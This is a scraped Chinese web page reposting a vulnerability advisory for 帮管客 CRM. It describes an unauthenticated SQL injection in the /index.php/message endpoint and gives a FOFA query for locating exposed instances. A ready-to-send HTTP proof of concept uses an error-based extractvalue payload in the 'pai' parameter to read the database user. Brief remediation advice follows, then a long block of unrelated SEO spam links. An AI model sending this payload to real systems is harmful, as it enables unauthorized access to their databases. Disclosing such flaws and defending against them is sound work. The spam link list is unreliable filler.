当前位置: 首页 > news >正文

阿里云申请域名站长之家seo查询

阿里云申请域名,站长之家seo查询,制作logo设计,深圳网站建设优化服务0x01 产品简介 帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统,客户管理,从未如此简单,一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化数据分析帮管客颠覆传…

0x01 产品简介

  帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统,客户管理,从未如此简单,一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化数据分析帮管客颠覆传统,重新定义企业管理系统。 

0x02 漏洞概述

 帮管客CRM 客户管理系统/index.php/message 接口存在 sql 注入漏洞,未经身份认证的攻击者可通过此漏洞获取数据库敏感信息。

0x03 复现环境

FOFA:app="帮管客-CRM"

0x04 漏洞复现 

PoC

GET /index.php/message?page=1&pai=1%20and%20extractvalue(0x7e,concat(0x7e,(select+user%28%29),0x7e))%23&xu=desc HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

查询当前用户

0x05 修复建议

官方已发布安全版本,请用户联系厂商修复漏洞:https://www.bgk100.com/

部署Web应用防火墙,对数据库操作进行监控。

如非必要,禁止公网访问该系统。


 

http://www.tj-hxxt.cn/news/40199.html

相关文章:

  • 厦门网站建设公司seo排名优化排行
  • 免费永久网站注册百度关键词查询
  • 做网站二级页面的百度竞价被点击软件盯上
  • 火车头采集做网站赚钱做网络推广要学些什么
  • 网站制作常用代码东莞做好网络推广
  • 网站做seo推广论坛软文案例
  • 网站宣传方法中国搜索引擎
  • 网站策划过程丁的老头seo博客
  • 专门做批发的网站吗小广告怎么能弄干净
  • 做电商网站的流程seo词条
  • 网站开发公司团队优势网站数据统计工具
  • 成都 网站原创权重查询爱站网
  • ftp wordpress 区别免费网站seo排名优化
  • 做网站怎么推广产品推广文案范文
  • 在哪做网站建设做灰色词seo靠谱
  • 上市公司排名短视频seo软件
  • 广州企业网站建设推荐网址seo分析
  • 电子商务网站规划与建设论文seo优化的基本流程
  • 如何自建淘宝客网站企业宣传册
  • 专业的网站建站公司网站建设网络推广平台
  • seo网站做推广公司网站推广方案有哪些
  • 公司做网站的法律依据品牌推广计划
  • 营销型网站建设标准品牌推广方案
  • 网站上的验证码怎么做数字营销公司
  • wordpress首页空白seo刷关键词排名免费
  • 购买网站模板怎么用百度贴吧官网
  • 长沙网站优化步骤百度区域代理
  • 合肥有没有做网站的单位深圳网络营销和推广方案
  • 亚马逊商城官方网站酒吧营销用什么软件找客源
  • 哪个网站可以做卖房站长工具ip地址查询域名